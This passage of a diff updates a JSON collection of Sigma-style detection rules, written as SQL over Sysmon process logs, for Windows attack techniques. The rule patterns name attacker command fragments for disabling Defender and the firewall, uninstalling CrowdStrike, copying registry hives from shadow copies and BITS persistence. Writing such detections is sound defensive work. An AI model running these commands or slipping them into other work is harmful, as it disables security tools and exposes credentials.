'%-change %' ESCAPE '\\' AND CommandLine LIKE '%-standby-timeout-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hostname_execution.yml" + "filename": "proc_creation_win_powercfg_execution.yml" }, { - "title": "Suspicious MSHTA Child Process", - "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", - "status": "test", - "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", - "author": "Michael Haag", + "title": "Copy From VolumeShadowCopy Via Cmd.EXE", + "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", + "status": "experimental", + "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005", - "car.2013-02-003", - "car.2013-03-001", - "car.2014-04-003" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Printer software / driver installations", - "HP software" + "Backup scenarios using the commandline" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_child_processes.yml" + "filename": "proc_creation_win_cmd_shadowcopy_access.yml" }, { - "title": "Possible Shim Database Persistence via sdbinst.exe", - "id": "517490a7-115a-48c6-8862-1a481504d5a8", - "status": "test", - "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", - "author": "Markus Neis", + "title": "Suspicious Schtasks Execution AppData Folder", + "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "status": "experimental", + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", "tags": [ + "attack.execution", "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdbinst_shim_persistence.yml" + "filename": "proc_creation_win_schtasks_appdata_local_system.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip", - "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", + "title": "Suspicious WmiPrvSE Child Process", + "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "status": "test", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects suspicious and uncommon child processes of WmiPrvSE", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\')))) AND NOT ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" }, { - "title": "Process Memory Dump Via Dotnet-Dump", - "id": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", + "title": "Windows Firewall Disabled via PowerShell", + "id": "12f6b752-042d-483e-bf9c-915a6d06ad75", "status": "experimental", - "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects attempts to disable the Windows Firewall using PowerShell", + "author": "Tim Rauch", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562" ], "falsepositives": [ - "Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dotnet-dump.exe' ESCAPE '\\' OR OriginalFileName = 'dotnet-dump.dll') AND CommandLine LIKE '%collect%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND CommandLine LIKE '% -Enabled %' ESCAPE '\\' AND CommandLine LIKE '% False%' ESCAPE '\\') AND (CommandLine LIKE '% -All %' ESCAPE '\\' OR CommandLine LIKE '%Public%' ESCAPE '\\' OR CommandLine LIKE '%Domain%' ESCAPE '\\' OR CommandLine LIKE '%Private%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dotnet_dump.yml" + "filename": "proc_creation_win_powershell_disable_firewall.yml" }, { - "title": "Potential Tampering With Security Products Via WMIC", - "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", - "status": "test", - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Elevated System Shell", + "id": "178e615d-e666-498b-9630-9ed363038101", + "status": "experimental", + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "author": "frack113, Tim Shelton (update fp)", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND LogonId = '0x3e7')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentImage LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c btool server list general --no-log' ESCAPE '\\')) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\system32\\\\reg.exe query hklm\\\\software\\\\microsoft\\\\windows\\\\softwareinventorylogging /v collectionstate /reg:64%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /c PAUSE' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_uninstall_security_products.yml" + "filename": "proc_creation_win_susp_elevated_system_shell.yml" }, { - "title": "Disable Windows Defender AV Security Monitoring", - "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "title": "Suspicious Execution of InstallUtil To Download", + "id": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", "status": "experimental", - "description": "Detects attackers attempting to disable Windows Defender using Powershell", - "author": "ok @securonix invrep-de, oscd.community, frack113", + "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" - ], - "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" - }, - { - "title": "Remote Access Tool - ScreenConnect Execution", - "id": "57bff678-25d1-4d6c-8211-8ca106d12053", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", - "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of the tool" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'ScreenConnect Service' OR Product = 'ScreenConnect' OR Company = 'ScreenConnect Software'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR OriginalFileName = 'InstallUtil.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect.yml" + "filename": "proc_creation_win_lolbin_installutil_download.yml" }, { - "title": "Uninstall Crowdstrike Falcon Sensor", - "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", - "author": "frack113", + "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", + "id": "b66474aa-bd92-4333-a16c-298155b120df", + "status": "experimental", + "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", + "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" + "filename": "proc_creation_win_schtasks_powershell_persistence.yml" }, { - "title": "HTML Help Shell Spawn", - "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", + "title": "Local Accounts Discovery", + "id": "502b42de-4306-40b4-9596-6f590c81f073", "status": "test", - "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", - "author": "Maxim Pavlunin", + "description": "Local accounts, System Owner/User discovery using operating systems utilities", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.001", - "attack.t1218.010", - "attack.t1218.011", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1047", - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1218" + "attack.discovery", + "attack.t1033", + "attack.t1087.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or user enumerates local users for legitimate reason" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE 'C:\\\\Windows\\\\hh.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR Image LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\Windows\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% /c%' ESCAPE '\\' AND CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Users\\\\%' ESCAPE '\\') AND NOT (CommandLine LIKE '% rmdir %' ESCAPE '\\')) OR (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '%user%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%/domain%' ESCAPE '\\' OR CommandLine LIKE '%/add%' ESCAPE '\\' OR CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/active%' ESCAPE '\\' OR CommandLine LIKE '%/expires%' ESCAPE '\\' OR CommandLine LIKE '%/passwordreq%' ESCAPE '\\' OR CommandLine LIKE '%/scriptpath%' ESCAPE '\\' OR CommandLine LIKE '%/times%' ESCAPE '\\' OR CommandLine LIKE '%/workstations%' ESCAPE '\\'))) OR (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%useraccount%' ESCAPE '\\' AND CommandLine LIKE '%get%' ESCAPE '\\') OR (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' AND CommandLine LIKE '% /l%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" + "filename": "proc_creation_win_susp_local_system_owner_account_discovery.yml" }, { - "title": "Monitoring For Persistence Via BITS", - "id": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", - "status": "test", - "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", - "author": "Sreeman", + "title": "Sideloading Link.EXE", + "id": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "status": "experimental", + "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1197" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/SetNotifyCmdLine%' ESCAPE '\\' AND (CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\')) OR (CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/Addfile%' ESCAPE '\\' AND (CommandLine LIKE '%http:%' ESCAPE '\\' OR CommandLine LIKE '%https:%' ESCAPE '\\' OR CommandLine LIKE '%ftp:%' ESCAPE '\\' OR CommandLine LIKE '%ftps:%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\link.exe' ESCAPE '\\' AND CommandLine LIKE '%LINK /%' ESCAPE '\\') AND NOT (((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bitsadmin_potential_persistence.yml" + "filename": "proc_creation_win_lolbin_sideload_link_binary.yml" }, { - "title": "Terminal Service Process Spawn", - "id": "1012f107-b8f1-4271-af30-5aed2de89b39", - "status": "test", - "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", - "author": "Florian Roth (Nextron Systems)", + "title": "Disable Important Scheduled Task", + "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 